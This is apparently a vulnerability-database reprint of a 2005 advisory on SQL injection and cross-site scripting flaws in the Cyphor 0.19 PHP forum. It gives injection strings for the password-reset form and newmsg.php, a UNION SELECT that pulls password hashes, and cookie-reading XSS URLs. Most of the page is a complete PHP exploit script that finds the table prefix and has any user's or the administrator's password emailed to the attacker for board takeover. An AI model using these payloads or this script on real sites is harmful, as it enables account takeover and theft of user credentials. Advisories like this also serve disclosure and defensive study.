Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053318 漏洞类型
发布时间 2005-10-11 更新时间 2005-10-11
CVE编号 CVE-2005-3236
CVE-2005-3237
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2005100030
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Cyphor Multiple Security Vulnerabilities (SQL Injection and CSS)
------------------------------------------------------------------------


SUMMARY

 <http://www.cynox.ch/cyphor/about.php> Cyphor is "a configurable
Webforum, which uses PHP4's session capabilities to authenticate users,
the MySQL database system to store all its data in, and Cascading Style
Sheets (CSS) to configure the "Look and Feel" of the forum. Only
registered users can post messages, registered users are split up into
normal users, moderators and administrators. Moderators and administrators
can delete threads, administrators can change board settings, create new
forums etc".

Multiple security vulnerabilities have been discovered in Cyphor that
allow remote attackers to cause the program to execute arbitrary SQL
statement and include arbitrary HTML and/or JavaScript into pages returned
to users.

DETAILS

Vulnerable Systems:
 * Cyphor version 0.19

If PHP's magic quotes have been set to off a remote attacker can trigger
numerous SQL injections:
SQL Injection in 'Forgot Password Interface':
The "Forgot your password?" feature allows you to send yourself a new
administrator password, this by supplying an SQL injecting string into the
information sent to the server:

email: [your_email]
nick: 'or'X'='X

This will trigger an email of the sorts of:
You have registered for a Cyphor forum (My Discussions). This is your
confirmation.

Your username is: 'or'X'='X
Your password is: mixa-13b

Now you can go to administration panel, create/edit/delete
forums/group/users, you can insert evil javascript code in terms of usage
or welcome message.

SQL Injection newmsg.php:
To see table_prefix (usually "cyphor_") use the following request:
http://[target]/cyphor/newmsg.php?fid='

You can cause the server to return the administrator password hash by
using the following URL:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT nick, password,
null, null FROM [table_prefix]users /*

(it is encrypted by crypt() function with username as key, one way ... but
can try to brute force it)

Cross Site Scripting in newmsg.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
http://[target]/[path]/newmsg.php?fid='' UNION SELECT null, "<
script>alert(document.cookie)< /script>", null, null/*

Cross Site Scripting in footer.php:
The following URL will trigger an cross site scripting attack against
users viewing the below link:
http://[target]/[path]/include/footer.php?t_login=<
script>alert(document.cookie)< /script>

Exploit:
< ?php
# --- cyphor019_xpl.php 7.36 08/10/2005 #
# #
# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then #
# send yourself any user / admin password right now! #
# #
# Sun Tzu: "There are five ways of attacking with fire. The first is to
burn #
# soldiers in their camp; the second is to burn stores; the third is to
burn #
# baggage trains; the fourth is to burn arsenals and magazines; the fifth
is #
# to hurl dropping fire amongst the opponent." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'< html>< head>< title>Cyphor 0.19 SQL Injection/board takeover <
/title>< meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> < style
type="text/css"> body { background-color:#111111;
SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important}
option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1
{font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size:
0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} *
{font-style:
normal !important} *{text-decoration: none !important}
a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration:
underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,
sans-serif;
font-weight:bold; font-style: italic;}-->< /style>< /head>< body>< p
class="Stile6">
Cyphor 0.19 (possibly prior versions) SQL injection / board takeover <
/p>< p
class="Stile6"> a script by rgod at < a href="http://rgod.altervista.org"
target="_blank"> http://rgod.altervista.org< /a>< /p> < table
width="84%">< tr> < td
width="43%">< form name="form1" method="post"
action="'.$SERVER[PHP_SELF].'?path=
value&host=value&port=value&username=value&proxy=value&your_email=value">
< p>
< input type="text" name="host">< span class="Stile5"> hostname (ex:
www.sitename.
com)< /span>< /p>< p>< input type="text" name="path">< span
class="Stile5"> path (ex:
/cyphor/ or /forum/ or just /)< /span>< /p>< p>< input type="text"
name="port">< span
class="Stile5"> specify a port other than 80 (default value)< /span>< /p><
p>< input
type="text" name="username">< span class="Stile5">user whom you want the
password
,admin? ;) < /span> < /p> < p> < input type="text" name="your_email"><
span
class="Stile5"> email where the password will be sent< /span> < /p> < p> <
input
type="text" name="proxy">< span class="Stile5"> send exploit through an
HTTP prox
y (ip:port) < /span>< /p>< p>< input type="submit" name="Submit"
value="go!">< /p>
< /form>< /td>< /tr>< /table>< /body>< /html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '< table border="0">< tr>';
while ($ii < = strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
       $ji=0;
       $ci++;
       echo "< td> < /td>";
       for ($li=0; $li< =15; $li++)
           { echo "< td>".$headeri[$li+$ki]."< /td>";
              }
      $ki=$ki+16;
      echo "< /tr>< tr>";
      }
if (strlen($datai)==1) {echo "< td>0".$datai."< /td>";} else
{echo "< td>".$datai."< /td> ";}
$ii++;
$ji++;
}
for ($li=1; $li< =(16 - (strlen($headeri) % 16)+1); $li++)
           { echo "< td>&nbsp&nbsp< /td>";
            }

for ($li=$ci*16; $li< =strlen($headeri); $li++)
           { echo "< td>".$headeri[$li]."< /td>";
              }
echo "< /tr>< /table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
      if (!$ock) { echo 'No response from '.htmlentities($host).'...';
            die;
            }}

       else
      {
      if (!eregi($proxy_regex,$proxy))
      {echo htmlentities($proxy).' -> not a valid proxy...';
       die;
      }
      $parts=explode(':',$proxy);
      echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...< br>';
      $ock=fsockopen($parts[0],$parts[1]);
      if (!$ock) { echo 'No response from proxy...';
            die;
            }
      }
fputs($ock,$packet);
if ($proxy=='')
 {

  $html='';
  while (!feof($ock))
   {
    $html.=fgets($ock);
   }
 }
else
 {
  $html='';
  while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  {
   $html.=fread($ock,1);
  }
 }
fclose($ock);
echo nl2br(htmlentities($html));
}

define('EMAIL_PREG',
'#^[a-z0-9&\-_.\+]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+$#');
define('USER_PREG', '#^[A-Za-z0-9_\-]+$#');

if (($path< >'') and ($host< >'') and ($your_email< >'') and ($username<
>''))
{
if (!preg_match(EMAIL_PREG, $your_email)) {echo '< br>Need a valid
email...'; die;}
if (!preg_match(USER_PREG, $username)) {echo '< br>Need a valid
username...'; die;}
 if ($port=='') {$port=80;}
 if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

#STEP 1 -> retrieve the table prefix...
$packet="GET ".$p."show.php?fid=' HTTP/1.0 \r\n";
$packet.="User-Agent: GetRight/4.5xx\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacket($packet);

$temp=explode("SELECT * FROM ",$html);
$temp2=explode("forums WHERE",$temp[1]);
$table_prefix=trim($temp2[0]);

echo '< br> Table prefix ->'.htmlentities($table_prefix);
if ($table_prefix=='') {echo 'Exploit failed...'; die;}

#STEP 2 -> send yourself a new password...
$sql="') UNION SELECT * FROM ".$table_prefix."users WHERE
nick='".$username."'/*";
$sql=urlencode($sql);
$data="email=".urlencode($your_email)."&nick=".$sql."&submit=Submit";
$packet="POST ".$p."lostpwd.php HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."lostpwd.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
if (eregi("New password sent.",$html)) {echo '< br>Exploit
successful...check your email box...';}
                else {echo '< br>Exploit failed...';}
}
else
{ echo 'Fill in requested fields, optionally specify a proxy...'; }
?>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:retrogod@aliceposta.it>
rgod.
The original article can be found at:  
<http://rgod.altervista.org/cyphor019.html>
http://rgod.altervista.org/cyphor019.html